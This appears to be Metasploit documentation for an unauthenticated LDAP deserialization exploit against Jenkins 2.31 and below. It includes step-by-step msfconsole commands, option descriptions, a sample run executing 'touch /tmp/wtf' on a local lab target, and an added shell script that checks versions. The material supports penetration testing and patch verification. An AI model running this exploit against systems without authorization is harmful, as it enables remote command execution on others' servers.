GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/misc/jenkins_ldap_deserialize.md
Vulnerable Application

Jenkins 2.31 and below are vulnerable. Older releases can be downloaded from updates.jenkins-ci.org

The vulnerability does not require authentication; HTTP access to the vulnerable Jenkins instance is all that is needed on the attacker's side. The exploit does, however, rely on a connection back from the target to the LDAP listener described under Options, so the target must be able to reach that listener.
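As an added example (not part of the module documentation or of the Metasploit module itself), the following POSIX shell helper reads the `X-Jenkins` header that Jenkins sends on its HTTP responses and compares it, using `sort -V`, against the 2.31 cutoff stated above. The sample response headers are constructed for offline use, and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the Metasploit module docs: decide from the
# X-Jenkins response header whether a Jenkins server falls in the
# affected range (2.31 or below, as the module documentation states).

MAX_VULN=2.31

# Read raw HTTP response headers on stdin and print the X-Jenkins value.
# CRLF line endings are tolerated; the header name is matched case-insensitively.
jenkins_version_from_headers() {
  tr -d '\r' | awk 'tolower($1) == "x-jenkins:" { print $2; exit }'
}

# Print "vulnerable" if $1 is 2.31 or lower, "patched" otherwise.
# sort -V gives natural version ordering, so 2.9 sorts below 2.31.
jenkins_vulnerable() {
  ver=$1
  [ -n "$ver" ] || { echo unknown; return 2; }
  lowest=$(printf '%s\n%s\n' "$ver" "$MAX_VULN" | sort -V | head -n 1)
  if [ "$lowest" = "$ver" ]; then
    echo vulnerable
  else
    echo patched
  fi
}

# Live check against a running instance, e.g.
#   jenkins_check_host http://jenkins.example.internal:8080/
# (hypothetical host; requires network access and curl).
jenkins_check_host() {
  ver=$(curl -sS -I --max-time 10 "$1" | jenkins_version_from_headers)
  echo "$1 X-Jenkins=${ver:-none} $(jenkins_vulnerable "$ver")"
}

# Constructed sample response, so the parsing can be exercised offline.
# A 403 is typical for an unauthenticated request to a locked-down instance,
# and Jenkins still includes the X-Jenkins header on it.
SAMPLE_HEADERS='HTTP/1.1 403 Forbidden
X-Content-Type-Options: nosniff
X-Jenkins: 2.31
X-Jenkins-Session: 1234abcd
Content-Type: text/html;charset=UTF-8
'

# Run the offline check on the constructed sample.
sample_ver=$(printf '%s' "$SAMPLE_HEADERS" | jenkins_version_from_headers)
echo "sample X-Jenkins=$sample_ver $(jenkins_vulnerable "$sample_ver")"
```

The header check only tells you the core version; it says nothing about whether the instance is reachable from the attacker's LDAP listener, which the exploit also needs.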

Verification Steps

  1. Download Jenkins 2.31 (jenkins.war) from updates.jenkins-ci.org

  2. Start Jenkins: `java -jar jenkins.war`

  3. Start msfconsole

  4. Do: `use exploit/linux/misc/jenkins_ldap_deserialize`

  5. Do: `set RHOST [target host]`

  6. Do: `set PAYLOAD cmd/unix/generic`

  7. Do: `set CMD 'touch /tmp/wtf'`

  8. Do: `run`

  9. Verify that /tmp/wtf now exists on the target host.

Required Options

RHOST

The address of the Jenkins server.

Options

RPORT

The HTTP port of the Jenkins server. (Defaults to 8080)

TARGETURI

The path to the target instance of Jenkins. (Defaults to /)

SRVHOST

The local address to listen for the LDAP request on. (Defaults to 127.0.0.1) The default only works when msfconsole runs on the Jenkins host itself; against a remote target, bind to an interface the target can route to.

SRVPORT

The local port to listen for the LDAP request on. (Defaults to 1389)

LDAPHOST

The LDAP host the target will be told to connect to. Can differ from SRVHOST in an environment with port forwarding or NAT between the target and the listener: SRVHOST is where the listener binds, LDAPHOST is the address the target dials. (Defaults to 127.0.0.1) The target must be able to reach LDAPHOST:SRVPORT, or the exploit will complete without ever receiving the LDAP request.

Scenarios

Example usage against a Unix target running Jenkins 2.31.

```
msf > use exploit/linux/misc/jenkins_ldap_deserialize
msf exploit(jenkins_ldap_deserialize) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(jenkins_ldap_deserialize) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
CMD => touch /tmp/wtf
msf exploit(jenkins_ldap_deserialize) > run
[*] Exploit completed, but no session was created.
```

The `cmd/unix/generic` payload runs a single command and never opens a session, so "Exploit completed, but no session was created" is the expected output here; confirm success by checking that /tmp/wtf exists on the target. The 127.0.0.1 values in this run only work because Jenkins and msfconsole are on the same host.